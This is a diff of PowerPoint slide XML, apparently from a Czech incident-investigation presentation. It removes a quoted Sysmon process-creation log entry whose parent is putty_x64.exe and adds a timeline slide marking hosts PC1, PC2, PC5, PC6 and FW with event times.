-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1571625" y="728227"/>
-            <a:ext cx="10515600" cy="3600986"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\WINDOWS\system32\</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>User: PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 0x33832</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TerminalSessionId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 7660</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\Desktop\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0"/>
-              <a:t>putty_x64.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="11" name="Nadpis 10">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
@@ -7166,18 +8609,2432 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="1"/>
+            <a:off x="0" y="203407"/>
             <a:ext cx="12192000" cy="585926"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
+            <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr lang="cs-CZ" sz="5400" dirty="0"/>
+              <a:t>ČASOVÁ OSA</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Šipka: pětiúhelník 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717747CE-B663-444C-BFB3-5494E74640E9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="1280160"/>
+            <a:ext cx="10433304" cy="54864"/>
+          </a:xfrm>
+          <a:prstGeom prst="homePlate">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Šipka: pětiúhelník 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693970EB-BAA3-44FF-98E3-CA609769E1C2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="2246376"/>
+            <a:ext cx="10433304" cy="54864"/>
+          </a:xfrm>
+          <a:prstGeom prst="homePlate">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Šipka: pětiúhelník 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DD2F10-0561-4872-A497-2DBEF83AF8CA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="3355798"/>
+            <a:ext cx="10433304" cy="54864"/>
+          </a:xfrm>
+          <a:prstGeom prst="homePlate">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Šipka: pětiúhelník 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A33793C-F4CD-4417-9A4C-EB2331C0D8F8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="4437788"/>
+            <a:ext cx="10433304" cy="54864"/>
+          </a:xfrm>
+          <a:prstGeom prst="homePlate">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Šipka: pětiúhelník 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42054E7B-261B-4692-B6AE-8E95C17F84DB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="5428288"/>
+            <a:ext cx="10433304" cy="54864"/>
+          </a:xfrm>
+          <a:prstGeom prst="homePlate">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextovéPole 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E05280D-327E-444F-AAB0-62F3009C8F03}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="4909030"/>
+            <a:ext cx="1024128" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
               <a:rPr lang="en-US" dirty="0"/>
+              <a:t>FW</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextovéPole 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D0A1CF-0847-45AA-950B-0090AC604CAE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="1807464"/>
+            <a:ext cx="1024128" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="TextovéPole 11">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C0FF8A-3101-4843-95C8-5AE06B693F8E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="2959034"/>
+            <a:ext cx="1024128" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC5</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextovéPole 12">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616F1324-C3FF-4816-BC44-49A33E831588}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="3973394"/>
+            <a:ext cx="1024128" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC6</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="TextovéPole 13">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD40797-E8A0-45CA-99C6-D919A29679A0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="910853"/>
+            <a:ext cx="1024128" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="Řečová bublina: obdélníkový bublinový popisek 15">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E877136-BADF-4493-AB98-831F2E45B320}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3056001" y="4783205"/>
+            <a:ext cx="685800" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>21:14</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="19" name="Obrázek 18">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319A71DB-E42A-4EF2-A07E-02B798695BE0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="28290" y="25628"/>
+            <a:ext cx="2507173" cy="1200955"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="Řečová bublina: obdélníkový bublinový popisek 14">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E693B1CA-B095-4479-98C1-0F88A3E895B3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2235708" y="648700"/>
+            <a:ext cx="685800" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>20:33</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="Řečová bublina: obdélníkový bublinový popisek 20">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668434A0-11C2-48E5-A53E-89AB6E25DD34}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4254246" y="1598526"/>
+            <a:ext cx="720852" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>22:05</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="Řečová bublina: obdélníkový bublinový popisek 21">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1632C10-F5AE-41A0-B849-68DF741C206C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8285988" y="645128"/>
+            <a:ext cx="685800" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>17:23</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="Řečová bublina: obdélníkový bublinový popisek 22">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A7B222-D562-4C84-9F3D-5BA9D597AC8B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9189720" y="634334"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>19:42</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="24" name="Řečová bublina: obdélníkový bublinový popisek 23">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BF3145-5BC0-4F61-A416-0DB17DDF5373}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10232136" y="634334"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
